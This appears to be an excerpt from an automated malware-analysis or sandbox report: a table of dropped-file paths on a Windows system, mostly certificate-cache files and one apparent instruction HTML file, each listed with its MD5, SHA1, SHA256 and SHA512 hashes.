| SHA256 | 9fb351416b3fd0e39f85731145759a24ba0722c51ed2f4e9a8316cca5660d931 |
| SHA512 | 838d6dbe49a30b8fb86a4d3858232be1d6bd51e120292d700fcd315ab538e39a684e17b4fc181f03802447dd6a337bab208f4f7b6a877ad6bebb832caccd47d6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8226a34afce298171a0cffc77e2d11bd |
| SHA1 | 59b2a3268bcb7972f60e9c0201f186c2c372e764 |
| SHA256 | b717dc7c451e15107491ac3a5a1f9cea7f94dd18f2fd5fc4252d81daae56f697 |
| SHA512 | 935d61781c8c6261f40dc9c9ff663f8e8ebd862c1fac1a06d156154d9a445920921531b8ae627f66d57fa07803d44db2f3498667c7f36e1df44b74bd06986ea6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ee99b1cc9ffcb77aef5d97b9dce84873 |
| SHA1 | 123ec72927338ef0827adb91725af88cff412141 |
| SHA256 | ca717315ac3ea8bf8e76164c1058f2eb9f364f14a61cc1b2eb60e9cea354552f |
| SHA512 | 4188592994977c204342633b5806dac9aa5e40306315d43cc8f4e730cc2e3f851785c93664ecc2b8df30324a707fadfe0d74f90a2e06d2c85789153b651d3c2d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 161b4e600598c5bda33bee0b33a20e4b |
| SHA1 | a95fc19359a98179adcc2faaba064f3b7fa215ae |
| SHA256 | 1875d8d8ea9222a1cb6e76f9a8b37bb316b5b760d6c6f96a3dddd69ffe7ec1d7 |
| SHA512 | a78ff675d1dce938c5ca35320329545a000023c3d96b040b944d64030759f615060910780da2ade19e917da63d3e476afe0bbed8f8f17b547eb63d7b4d2ac88b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a566c0ef48b84fe720d5749dda0d9f20 |
| SHA1 | a19c4d1713bc0aa2960a86dc44d6845213de6e71 |
| SHA256 | da065468233c4069c182a0c11a1c921e4bffbb85ba119398b381cf76be500255 |
| SHA512 | 0fc794d4cce646bc915fdd5252bcfe22249bc63c4a22139267021128aa4e59cd519d031d7b777007a5abbbb2addfb7740a02c9635829bb757915c95e2cc2bdcd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3131afb67f6892c07118fe7fd95d4aac |
| SHA1 | 7bcbb085aee63a4acf86dec721b948e7e209117d |
| SHA256 | 9d88958ad1d90a5a27abbbab0b0067a1c3b19126dd38996e198d503b4ea3ecb5 |
| SHA512 | a47a193ff0c5d81c4de336221a590dab7dbad74c7153f811aec0e5be13d9932ade26442812aaadf9706da592d4c0bdec16453d4d3293dc4f5afbc324d3899d3b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | ef4d7b5d8137620268ea909fa422114c |
| SHA1 | 53a26db5f8ba92a778c17ed507ad02e673c60452 |
| SHA256 | 99c8edac26fc7eb151395fc605f57492310f1ce6ff5ee86b32dcc64236614bb4 |
| SHA512 | 9a419e13ba6a43f498ae057db4f93dea3ab33237b02f30f70fa892ba54f568f20efc31c607bb51239566d04be6b3f8d3c514bcbdafa941cfe6ac9ffab464df9e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 90324f8e8bb922c5ee1c1901b584a4ee |
| SHA1 | 217ef07c4f408f16fc7d6bd0c336c82f62fa4f0a |
| SHA256 | 2aaeeab0207e0d3230a68a28c13d2bf9156567ae015c83b3072db5342fd38a2b |
| SHA512 | 5bae4e2a4c2a0780f83eaca29e25307da6b21eb0a50943857a522389e1dbb8ff409217fab565fee8490ca15a7ec1228eb4c590ffc9907f0590d98c26d1530ba6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6dd4ca0bf0ec82bd52a45a250b5e02f5 |
| SHA1 | 07dd930aeef5ba9919eb7f68bf71cf7e32d8a614 |
| SHA256 | b16cba0940248eccd37709936c23ded9f243aa8cabb5876df35edf2cfeee5207 |
| SHA512 | ab64be6f166391214b2e0bccd17de358b7a13b7d802da62872a361bca0b5646560ff1f7cbf406f246a929c1906effb2ea70ada42e129cab90c2c4d09b12a381e |
C:\Users\Admin\AppData\Local\Temp\~DF2B05BD27ED2D5EE2.TMP
| MD5 | d11f86e3cbc9197de84e2ee9e1198be0 |
| SHA1 | c2c258a3f8af0ffeb2d7d5eb216ea194ba522742 |
| SHA256 | 98515c9e1c20d3cca284cc421737dd44f2a574be4f3ab33810b0ab436b1bec2b |
| SHA512 | d986560fa4fff2a491c94283e5cd0980810fa444457985e31d10194be732bfe1577a46f43aaef62cfe315e0a990f77b6f38b64f9aa5e96b31c3637d7f200d3d0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6f768ff35ff1810f14e4579fe005bcb6 |
| SHA1 | 802d6afa062e82a4e07231b34d114fb18b9ecb50 |
| SHA256 | 1fda1217a7be84c5ed4791432b8c78e5bcc410e549bb7150584ab34a1b25f2e7 |
| SHA512 | e2f95a37788e4cb20c99404529dae9151f07047fa65b9e194e535111bd1c9bfc0e8a5917a21a2bf314b5b2d8544d3c4de6cd9601bb62ede4a75bb974319621a2 |
C:\ProgramData\Microsoft\Network\Connections\_8-INSTRUCTION.html
| MD5 | 6182ca2105f6c66cc28f76d3e744fd68 |
| SHA1 | c8adbfd9c83dc373ec66be0ab8a3732782ae6d81 |
| SHA256 | 756cb93ee163e521f00eb1b50b9a051ef068b87b96a7938db5ae3e273f53672c |
| SHA512 | 1c07d84f9a89112737e864a73f16e2142a5d14cef1f8254860aa629c162ed90b4f4fd634c48c8d5c96950f30dfc1f6fb88bb97cad2f2a90f763be848ff5da3e3 |